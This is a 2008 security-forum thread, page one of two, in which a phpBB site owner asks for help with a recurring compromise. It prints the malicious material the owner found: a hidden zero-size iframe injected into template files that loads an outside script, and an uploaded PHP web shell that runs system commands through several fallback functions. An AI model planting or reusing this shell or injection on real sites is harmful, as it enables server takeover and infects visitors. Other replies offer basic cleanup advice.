Waraxe IT Security Portal
Login or Register
October 10, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 77
Members: 0
Total: 77
Full disclosure
SEC Consult SA-20241009-0 :: Local Privilege Escalation via MSI installer in Palo Alto Networks GlobalProtect (CVE-2024-9473)
APPLE-SA-10-03-2024-1 iOS 18.0.1 and iPadOS 18.0.1
Some SIM / USIM card security (and ecosystem) info
SEC Consult SA-20240930-0 :: Local Privilege Escalation via MSI Installer in Nitro PDF Pro (CVE-2024-35288)
Backdoor.Win32.Benju.a / Unauthenticated Remote CommandExecution
Backdoor.Win32.Prorat.jz / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Amatu.a / Remote Arbitrary File Write (RCE)
Backdoor.Win32.Agent.pw / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Boiling / Remote Command Execution
Defense in depth -- the Microsoft way (part 88): a SINGLEcommand line shows about 20, 000 instances of CWE-73
SEC Consult SA-20240925-0 :: Uninstall Password Bypass in BlackBerry CylanceOPTICS Windows Installer Package (CVE-2024-35214)
Apple iOS 17.2.1 - Screen Time Passcode Retrieval (MitigationBypass)
CyberDanube Security Research 20240919-0 | Multiple Vulnerabilities in Netman204
Submit Exploit CVE-2024-42831
Stored XSS in "Edit Profile" - htmlyv2.9.9
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> [help] Someone hacking my site! Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
[help] Someone hacking my site!
PostPosted: Sat Mar 08, 2008 6:57 am Reply with quote
abdulbasit
Regular user
Regular user
Joined: Mar 07, 2008
Posts: 24




Hello,

Can anyone please help me as someone is hacking my site every 2-3 days by adding it's code in any of my page such as overall_header.tpl, overall_footer.tpl, page_tail.php, page_header.php and many other files with the following code:-

Code:
<td valign="top"><_i_frame__ src="http://pinoc.com/count.php?o=2" width=0 height=0 style="hidden" _frame_border=0 marginheight=0 marginwidth=0 scrolling=no></_i_frame__><table class="blog" cellpadding="0" cellspacing="0"><tr><td valign="top"><div>


Can anyone help me in getting rid of this hacker? He is adding the code anywhere on my server and it seems that some tool/utility/code exists on my server through which the hacker is gaining access and editing any file anytime!
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 8:26 am Reply with quote
abdulbasit
Regular user
Regular user
Joined: Mar 07, 2008
Posts: 24




Someone also uploaded a file fab666.php at language/lang_english/fab666.php on my server with the following codes in it

Code:
<?php
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

?>


Can anyone please help me in getting rid of this hacker who is accessing my server and uploading whatever he wants and does what he wants. Changing password doesn't work. All files/folders permission are set right. Still he is gaining access.

I need help please Sad
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 8:34 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Change pass to FTP,cpanel ..etc.
Where you hosting your site?
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 8:44 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




Tell us any public applications you have on your site and their version and we can see if there's any public hacks. otherwise someone has found a way in to your site. check logs for the IP and try IP ban.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Sat Mar 08, 2008 9:01 am Reply with quote
abdulbasit
Regular user
Regular user
Joined: Mar 07, 2008
Posts: 24




gibbocool wrote:
Tell us any public applications you have on your site and their version and we can see if there's any public hacks. otherwise someone has found a way in to your site. check logs for the IP and try IP ban.


I don't have any technical knowledge. Can you please tell me what do you mean by public applications? I know that I have installed phpBB latest version with over 150 MODs on board. I don't know how to check logs for this domain because I am on shared hosting with this domain is ADD ON domain and using Cpanel.
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 9:06 am Reply with quote
abdulbasit
Regular user
Regular user
Joined: Mar 07, 2008
Posts: 24




koko wrote:
Change pass to FTP,cpanel ..etc.
Where you hosting your site?


I changed FTP, Cpanel password but there is no use. The hacker doesn't need to have any password and gaining access through some other way.

I am hosted at Lypha.com with Shared Hosting Package
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 9:07 am Reply with quote
Sm0ke
Moderator
Moderator
Joined: Nov 25, 2006
Posts: 141
Location: Finland




he have hacked/cracked another site on server so there is nothing you can do exept report your hosting
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 9:12 am Reply with quote
abdulbasit
Regular user
Regular user
Joined: Mar 07, 2008
Posts: 24




Sm0ke wrote:
he have hacked/cracked another site on server so there is nothing you can do exept report your hosting


I checked many sites hosted on my shared hosting account but they all are working fine. I mean all the sites which are of others but hosted on my shared server.
The hacker is uploading files to hack my site, also he is adding codes in my files through which my site doesn't operate properly. I am willing to pay some good amount of money if anyone can help me getting rid of this hacker completely.
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 9:50 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




If server sucksss nobody can help you.Make temp ftp account and send info via PM i look.
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 10:03 am Reply with quote
abdulbasit
Regular user
Regular user
Joined: Mar 07, 2008
Posts: 24




koko wrote:
If server sucksss nobody can help you.Make temp ftp account and send info via PM i look.


I have requested my host to change server and they will do in 1-2 days. After that I will see what happens and let you guys know what going on...

Thanks for the support everyone Smile
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 10:06 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




If this hacker hide some code in your appz changing server don't help you.
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 10:12 am Reply with quote
abdulbasit
Regular user
Regular user
Joined: Mar 07, 2008
Posts: 24




koko wrote:
If this hacker hide some code in your appz changing server don't help you.


What to do then? I don't know where he have stored what file!
Also I don't know to create FTP account to give you access or something because this domain is Add-on domain of the main domain and the hacker is after my Add-on domain on which phpBB is installed. Everything was fine before 2 months and he is attacking every 2-3 days from 2 months!
View user's profile Send private message
PostPosted: Sun Mar 09, 2008 12:40 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




He could be using a vulnerability in one of your phpbb mods. Otherwise it's because the host isn't secure. Maybe he made an account on the host just so he can hack all the other websites. You never know.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Sun Mar 09, 2008 12:26 pm Reply with quote
abdulbasit
Regular user
Regular user
Joined: Mar 07, 2008
Posts: 24




gibbocool wrote:
He could be using a vulnerability in one of your phpbb mods. Otherwise it's because the host isn't secure. Maybe he made an account on the host just so he can hack all the other websites. You never know.


Which phpBB MOD you think is not secure?
I am moving to other host and will see what happens.

Also I found 1 hacking utility uploaded on my server and I deleted but still he was able to add pinoc.com code in my site!

My site is in public_html so do you think the hacker might have uploaded its utility in any other folder other then public_html ?

Also can you guys tell me some sites where I can submit complaint about this hacker and it's website so that they can take some serious action against him
?

Thank you
View user's profile Send private message
PostPosted: Sun Mar 09, 2008 12:36 pm Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




Get your logs and go through them to find IP and other info about what he's been doing. Then you can report it to your local authorities.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
[help] Someone hacking my site!
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.044 Seconds